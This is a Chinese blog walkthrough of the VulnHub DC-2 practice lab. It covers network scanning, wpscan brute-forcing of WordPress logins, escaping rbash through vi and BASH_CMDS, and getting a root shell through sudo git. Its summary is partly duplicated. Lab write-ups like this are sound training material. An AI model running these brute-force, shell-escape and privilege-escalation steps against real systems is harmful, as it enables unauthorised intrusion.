vulnhub-dc2靶场

已于 2024-01-19 18:12:47 修改
阅读量1.9k 收藏 30
点赞数 47
分类专栏: 靶场练习 vulnhub 权限提升 文章标签: vulnhub 权限提升 linux
于 2024-01-19 17:40:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/135703713
版权

DC2

配置环境vmware17 + nat网络配置

下载地址:DC and Five86 Series Challenges - DC-1

(似乎从2024/1/18左右找不到这个资源了)

攻击机kali与其在同一网段下 ip:192.168.52.130

信息收集

arp-scan -l #内网探测,扫描目标ip

image-20240119134743828

发现目标ip192.168.52.130

使用nmap对目标进行扫描

nmap -T4 -sV -O -A -Pn -p- 192.168.52.130

image-20240119134857209

发现开放端口80,7744

重定向

先访问80的http服务

image-20240119135004267

这里域名跳转了,但是显示找不到此网站,挂上burpsuite,抓包查看情况

HTTP/1.1 301 Moved Permanently
Date: Thu, 18 Jan 2024 20:05:59 
Server: Apache/2.4.10 (Debian)
Location: http://dc-2/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

工具数据包可知,网站回复301状态码,永久重定向

通过修改host文件,将ip地址和dc-2域名强行绑定,(host可以简单理解为对域名的解析处理,解析手动指定的ip地址,以便于绕过dns查询)

image-20240119135659751

去掉这个勾选只读

然后用vscode打开host文件,在最底层添加一个

192.168.52.130 dc-2

image-20240119135856497

此时直接打开网站

image-20240119140006811

点开右上角的Flag

image-20240119140058737

可以发现这是一个使用wordpress搭建的网站

工具探测

flag中推荐使用cewl工具(一种使用ruby写的爬虫工具,可以爬取网站中的敏感信息组成字典,kali中自动集成了)

cewl http://dc-2 -w passwd.txt

image-20240119141518395

image-20240119141546471

再使用dirb挖掘目录信息

dirb http://dc-2/

image-20240119141926357

发现一个url

http://dc-2/wp-admin/admin.php

这个url是wordpress搭建的网站的登录页面

image-20240119142053812

关于wordpress搭建的站点,有一个非常好的工具,wpscan,可以利用其扫描功能对其测试

wpscan --url http://dc-2/ -e u      //枚举用户名字

image-20240119142616441

将这些人名写入文件中

echo "admin" >> usr.txt
echo "jerry" >> usr.txt
echo "tom" >> usr.txt

利用wpscan爆破账号密码

wpscan --url http://dc-2/ -U usr.txt -P passwd.txt

image-20240119143702773

jerry / adipiscing
tom / parturient

分别利用进行登录

登录后如果是空白,再重新输入一下urlhttp://dc-2/wp-admin/即可

image-20240119144036235

flag2的意思:在此wordpress中找不到有用的信息了,尝试其他方法

内网提权

之前nmap扫描时发现了一个7744端口的ssh服务

vi提权

基于此尝试ssh连接

ssh tom@192.168.52.130 -p 7744

这里只有tom的账号密码对了

image-20240119144345152

同时发现很多命令无法使用

image-20240119154905083

compgen -c       //查看可以使用的指令

image-20240119155752801

发现可以使用vi命令,此命令存在提权(本质上属于sudo提权)

先查看提示

vi flag3.txt

image-20240119155933240

先提权然后查看jerry账号

操作步骤

vi随便打开文件
输入:
再下面添加
:set shell=/bin/sh
:shell

image-20240119164803845

按回车,再次输入:

image-20240119164829571

image-20240119164842649

这时可以使用cd命令了,cd …找到上一层目录,进入Jerry文件夹下发现flag4,使用vi flag4.txt查看

image-20240119165113867

权限过低,想办法提权

rbash环境变量

先使用exit退出

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

image-20240119170254942

发现以及可以使用被限制的命令了

find / -perm -u=s -type f 2>/dev/null //找到存在sudo权限的命令

image-20240119170423065

切换用户

su jerry
git提权

查看sudo权限

sudo -l

image-20240119172000450

可以发现git命令存在sudo提权

基于此进行权限提升

方式:


sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!/bin/bash

然后按q退出,再输出sudo git -p help命令,同上输入!/bin/bash

image-20240119172321933

image-20240119172502115

image-20240119172527354

至此结束

总结

1、hosts文件指定ip对应域名

2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)

3、linux命令

compgen -c #查看当前可用命令
find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令
sudo -l #查看当前用户可使用的sudo权限

6)]

[外链图片转存中…(img-UnDKf5oc-1705657141846)]

至此结束

总结

1、hosts文件指定ip对应域名

2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)

3、linux命令

compgen -c #查看当前可用命令
find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令
sudo -l #查看当前用户可使用的sudo权限

4、权限提升:vi提权,rbash环境变量提权,git提权

longersking
关注
  • 47
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
兰宝 LR6.5QE1-DC2金属圆柱形DC2线制电感式传感器 说明书.pdf
09-22
兰宝 LR6.5QE1-DC2金属圆柱形DC2线制电感式传感器 说明书pdf,兰宝 LR6.5QE1-DC2金属圆柱形DC2线制电感式传感器 说明书
兰宝 LR6.5Q-DC2金属圆柱形DC2线制电感式传感器 说明书.pdf
09-22
兰宝 LR6.5Q-DC2金属圆柱形DC2线制电感式传感器 说明书pdf,兰宝 LR6.5Q-DC2金属圆柱形DC2线制电感式传感器 说明书
【DC系列】DC-2靶场
qq_51611948的博客
02-14 1103
详细介绍DC2靶机渗透全过程
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1711
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
DC-2靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-02 6428
DC-2靶场渗透实战过程
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
DC-2靶场搭建及渗透
weixin_55772865的博客
06-14 155
输入sudo -l发现可以使用git命令,可以使用root权限,但不需要root密码。但是缺少用户名字典,用wpscan进行用户枚举,再配合密码字典会提高效率。rbash是Restricted bash缩写,即受限制的bash。管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。ssh:7744端口还没有用到,用得到的账号密码连接7744端口。在rbash中,很多行为和命令都会被受到限制。看一看自己是谁,权限是怎样的,可以使用的命令。git很扎眼,虽然他让我滚出去!
兰宝 LR30X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书.pdf
10-09
兰宝 LR30X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书pdf,兰宝 LR30X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书
兰宝 LR30xE2 AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书.pdf
10-09
兰宝 LR30xE2 AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书pdf,兰宝 LR30xE2 AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书
兰宝 LR18X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书.pdf
10-09
兰宝 LR18X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书pdf,兰宝 LR18X AC-DC2-Y增强远距离型金属圆柱形系列-AC DC 2线电感式传感 说明书
DC-2靶场
m0_74413354的博客
03-14 589
Vulhub下DC系列靶场DC2靶场通关
DC-2靶场步骤
2302_79546589的博客
12-05 958
知识点如下,首先就是cewl和wpscan工具的使用,其次是nmap加强扫描得到端口;重定向;cewl工具的使用,得出密码字典;wpscan枚举账户,账号密码的破解;nikto或御剑扫描网站的站点登录;compgen -c 查看服务器可使用的命令;然后就是rbash的逃逸以及git的提权。总体来讲,我还是通过DC-2靶机学到了一些之前不了解的知识点,例如:rbash等等。
【DC2靶场通关详细记录】
博客
12-15 982
DC2靶场通关----使用cewl工具抓取网站内容生成密码字典cewl 网址 -w pass.txt使用wpscan枚举用户和爆破用户的登陆密码wpscan --url 网址 -e u和wpscan --url 网址 -U 用户名字典 -P 密码字典rbash绕过的方法:使用vi绕过rbashvi进入vi后:shellsudo提权方法!/bin/bash。
DC2靶场 wordpress
m0_62438849的博客
03-03 1028
试着登录网站,但是没有看到登录框,所以要扫描一下整个网站目录,可以用dirb http://dc-2或者dirsearch -u(指定url)http://dc-2。然后就能访问网站了,看到flag1,常用的字典攻击可能会不奏效,需要用 字典生成工具cewl,密码总是越多越好,但无法获得所有密码,登录后可以看到下一个flag。可以知道登录入口是,http://dc-2/wp-admin/(wordpress的登录入口就是/wp-admin/)Cewl是一个 ruby 应用,爬行指定url的指定深度。
DC2靶场渗透流程(超详细)
m0_64583632的博客
04-02 563
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 DC-2 和DC-1 差不多 还是需要找到5个flag
DC-2 靶场渗透
最新发布
lin__ying的博客
03-20 799
环境:kali ip:192.168.157.128靶机:dc-2 ip:192.168.157.129确保kali和靶机在NAT模式下。
Vulnhub靶场实战———DC2
m0_67309561的博客
05-02 289
Vulnhub靶场实战
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1806
dc-2实验
DC-2靶场记录
lionwerson的博客
11-17 973
1.下载DC-2靶场: 下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。 如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。 在hosts文件结尾添加: ip地址 dc-2 这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。 cewl -w dc.txt http://d.
cbm-dc2 超声波程序
10-14
CBM-DC2超声波程序是一种基于超声波技术的测量程序。CBM是嵌入式系统名称,DC2则表示第二代设备。该程序主要应用于测量距离、检测物体的位置、识别物体的形状等方面。 CBM-DC2超声波程序的工作原理是通过超声波发射器发射超声波信号,然后接收器接收到被物体反射后的声波信号。通过计算发射与接收之间的时间差,并结合声速的知识,可以准确地测量出被测物体与传感器之间的距离。这种测量方法具有非接触、快速、准确等优点,因此广泛应用于各个领域。 CBM-DC2超声波程序可以用于测量物体的距离。通过将传感器安装在测量物体附近,即可实时测量物体与传感器之间的距离。比如在机械领域中,可以用来检测机械设备中零件的位置和间距,以及机器人中的障碍物位置,可广泛应用于自动化生产线中。 此外,CBM-DC2超声波程序还可以用于检测物体的位置。通过分析声波信号的强弱或回波的时间差,可以确定物体在空间中的位置。这在自动驾驶领域中具有重要意义,可以用于检测周围车辆、行人或其他障碍物的位置和距离,以保证交通安全。 最后,CBM-DC2超声波程序还能用于识别物体的形状。通过分析声波信号的回波,可以获得物体的轮廓和形状信息。这在制造业中具有广泛的应用,可以用于产品检测、零件测量等,以提高生产效率和质量管理水平。 总之,CBM-DC2超声波程序是一种基于超声波技术的测量程序,可以应用于测量距离、检测物体位置和识别物体形状等多个领域,具有非接触、快速、准确等优点,在各个领域中发挥着重要作用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值